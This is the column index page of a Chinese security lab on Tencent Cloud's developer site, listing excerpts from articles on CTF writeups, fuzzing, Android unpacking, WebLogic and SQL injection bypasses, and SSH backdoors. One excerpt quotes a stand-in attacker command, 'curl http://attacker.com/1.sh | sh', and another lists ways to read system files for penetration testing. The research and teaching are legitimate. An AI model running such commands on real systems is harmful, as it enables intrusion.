逢魔安全实验室

代码在线跑，知识轻松学

Python精品学习库

自行/邀约他人一键搬运博客，速成社区影响力并领取好礼

博客搬家 | 分享价值百万资源包

往期视频·干货材料·成员作品 最新动态

技术创作特训营·精选知识专栏

新邀入驻腾讯云开发者社区，福利多多！

如何运用「云、端融合的数智化安全体系」高效护航数据安全

左手AI，右手安全 —— 一汽丰田数字化转型之路

https://blog.formsec.cn/2018/07/12/%E5%9F%BA%E4%BA%8EChrome-headless%E7%9A%84XSS%E6%A3%80%E6%B5%8B/

基于Chorme headless的xss检测实践

本文内容比较多，建议点击https://blog.formsec.cn/2018/07/03/wordpress%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

wordpress任意文件删除漏洞分析

本文内容比较多，建议点击https://blog.formsec.cn/2018/06/11/%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B92018-pwn-aleph1-Writeup/

铁人三项2018 pwn [aleph1] Writeup

这个题目的原题是RHME3，直接拿来二进制修改，去掉网络函数，使用socat部署。这波操作可还行

铁人三项2018 pwn [heapmain] Writeup

ISCC 2018 CTF中，一些题目还是很不错的。但是需要吐槽的就是这个积分机制，私以为一次性放出所有题目而且反作弊机制完善的情况下动态积分这个方法很好。但是，战线太长还是不要用动态积分。不过话说回来，战线长也是ISCC的传统吧。最后祝ISCC越办越好！也希望我们的Writeup能对大家有所帮助吧！
赛事的运维人员还是很nice的

ISCC 2018 Writeup

0x00 AFL 基础
American Fuzz Lop简称 AFL，是一款模糊测试工具。模糊测试（Fuzzing），是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法。通常的流程：提供一个正常的输入；修改一部分内容；输入给程序；观察程序的处理过程是否异常。
环境
Ubuntu 16.04 LTS X86_64
安装
apt install afl
如果大家需要较新版本的AFL，也可通过AFL的官网下载源码自行编译。http://lcamtuf.coredump.cx/afl/rel

American Fuzz Lop (AFL) Fuzz 初探

01 概述
—
由于近期很多朋友问关于Android加壳与脱壳技术，这两天我就对目前主流的脱壳工具和加壳方法做了研究，就对目前的脱壳方法做个汇总和方法记录。
首先目前市面上有很多的安卓脱壳工具，主流的有DexExtractor, ZjDroid, drizzleDumper,其中前面的2个工具与后面的工具略有不同，文章会一一对工具进行分析和尝试脱壳，各个工具的使用都在手机root的环境下进行的，并且在实体机上进行，所以如果有读者尝试破解的话建议还是在实体机上进行。
其实对于加壳的方案很多加固尝试都做了什么

某移动应用安全加固与脱壳技术研究与实例分析

注：本文仅用于知识分享，请勿用于非法攻击，任何后果与本团队无关。
01
简介
       在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？最近看了一篇@MagisterQuis写的文章https://magisterquis.githu

Linux无文件渗透执行ELF

0x01 背景
团队大佬在做PHP代码审计的时候发现PHP代码是被混淆过的。虽然可以通过自己手动解密可以还原原先的PHP代码，但是混淆过程比较复杂且自己写脚本还原非常麻烦。所以，我这边通过PHP底层的操作对混淆后的PHP代码进行还原。
0x02 PHP代码混淆原理

PHP代码混淆一般来说有两种方法：
需要PHP扩展
无需PHP扩展
本文我们主要讲解无需PHP扩展的代码混淆的解密。大多数的无需扩展的php代码混淆原理上都是使用eval进行代码的执行。如果我们能够得到eval函数的参数，即可获得解密后的代码

解密混淆的PHP程序

01 背景
       Oracle官方在修补老的Weblogic反序列化漏洞时，将已经在互联网上暴露的PoC都加入了黑名单，所以若是绕过他的黑名单限制就依旧可以触发命令执行。接下来我们简单分析一下本次漏洞的成因，具体的weblogic反序列化漏洞原理这里不做具体分析，之后可以分享一次专题。这里我们来看看InboundMsgAbbrev中resolveProxyClass的实现，resolveProxyClass是处理rmi接口类型的，只判断了java.rmi.registry.Registry，其实随便

CVE-2018-2628 Weblogic反序列化POC重构详解

0x00 背景

最近一直在研究IoT设备的安全，而在IoT设备上程序很多都是MIPS架构的。所以对MIPS指令有一定研究，而在DDCTF 2018中刚好有一道逆向题目是MIPS程序，于是尝试做了一下。
0x01 环境搭建
由于我们通常的操作系统指令集都是x86的，所以无法跑MIPS程序。这时候就需要装QEMU来模拟，QEMU通过源码编译较为复杂，我们又没有特殊的需求，所以直接使用ubuntu的APT进行安装即可。
由于MIPS架构有两种——大端MIPS和小端MIPS。所以，我们需要确定这个程序是大端MI

DDCTF 2018 逆向 baby_mips Writeup

There is always a method here is useful for you to penetrantion testing ：）
Some ways to read system files
 1cat /etc/issue
 2tac /etc/issue
 3less /etc/issue
 4more /etc/issue
 5head /etc/issue
 6tail /etc/issue
 7nl /etc/issue
 8xxd /etc/issue
 9sort /et

Some Linux Hacking Tricks


0x00 UAF
—
pwnable.kr是一个韩国的CTF练习的网站，有很多经典的CTF题目供爱好者练习。
UAF(Use After Free)释放后重用，其实是一种指针未置空造成的漏洞。在操作系统中，为了加快程序运行速度，如果释放一块n字节大小的内存空间，当申请一块同样大小的内存空间时，会将刚刚释放的内存空间重新分配。如果指向这块内存空间的指针没有置空，会造成一系列的问题。
0x01 Fastbin
—

fastbin顾名思义，fast就是要快。所以fastbin旨在加快操作系统的内存分配速度，f

UAF Writeup - pwnable.kr

01
—
综述
2018年02月02日，Grammarly官方更新了Grammarly for Chrome 14.826.1446版本，其中修复了一个严重漏洞，在此之前的版本中此扩展能够向所有网站曝

Grammarly For Chrome扩展任意用户劫持漏洞分析

新年马上到了，FormSec现在这里给大家拜年，祝大家狗年旺财！
当然新年礼物已经给大家备好了：《基于python的自动化代码审计》
      本文通过介绍在python开发中经常出现的常规web漏

基于python的自动化代码审计

对于UNIX系统来说，ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性，必然引起黑客关注，所以ssh类的后门也是unix下最经典的后门方式之一了。作为渗透基础知识，逢魔安全团队在本文

渗透基础-SSH后门分析总结

关注我们，掌握成员招募最新动态！
       Web安全中很重要的一个部分就是中间件的安全问题，而中间件的安全问题主要来源于两部分，一个是中间件本身由于设计缺陷而导致的安全问题，另一个就是默认配置或

中间件安全-Tomcat安全测试概要

0x00 插件背景
—
User-Agent Swither 是一款Chrome插件，用户切换访问web时候的User-Agent的，这个插件有51万条安装量。大部分都是前端工作人员或者安全研究人员使

隐藏在Chrome插件商店中的恶魔——恶意插件User-Agent Swither分析

01
—
前言
SQL注入从古至今都是一个经久不衰的影响严重的高危漏洞，但是网络安全发展到现在，如果想通过SQL注入直接获取数据或者权限，多多少少都需要绕过一些网站前面的WAF，无论是基于规则的还是带

SQL注入ByPass的一些小技巧


0x00 前言

2018伊始，两个芯片级漏洞Meltdown（熔断）、Spectre（幽灵）漏洞震惊的安全界。受影响的CPU包括Intel、AMD和ARM，基本囊括的消费级CPU市场的绝大部分。Meltdown漏洞可以在用户态越权读取内核态的内存数据，Spectre漏洞可以通过浏览器的Javascript读取用户态的内存数据。虽然这两个漏洞对个人PC影响有限，但是确摧毁了公有云的基石——用户可在虚拟机里可以无限制的读取宿主机或者其他虚拟机的数据。
0x01 背景知识
了解Meltdown和Spectre

从CPU漏洞Meltdown&Spectre看侧信道攻击

文章

问答

视频

学习中心

腾讯云实验室

直播

竞赛

腾讯云代码分析专区

腾讯iOA零信任安全管理系统专区

腾讯云架构师技术同盟交流圈

腾讯云数据库专区

腾讯云顾问专区

腾讯云原生专区

腾讯混元专区

腾讯云TCE专区

腾讯云Lighthouse专区

腾讯云HAI专区

腾讯云Edgeone专区

腾讯云存储专区

腾讯云智能专区

腾讯轻联专区 

腾讯云开发专区

TAPD专区

腾讯轻量云游戏服专区

腾讯云最具价值专家

腾讯云架构师技术同盟

腾讯云创作之星

腾讯云开发者先锋 

腾讯云代码助手

CODING DevOps

Cloud Studio

SDK中心

API中心

命令行工具

腾讯云开发者社区推出了逢魔安全实验室专栏，为你提供了逢魔安全实验室的相关文章，致力于帮助开发者快速成长与发展。

逢魔安全实验室

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐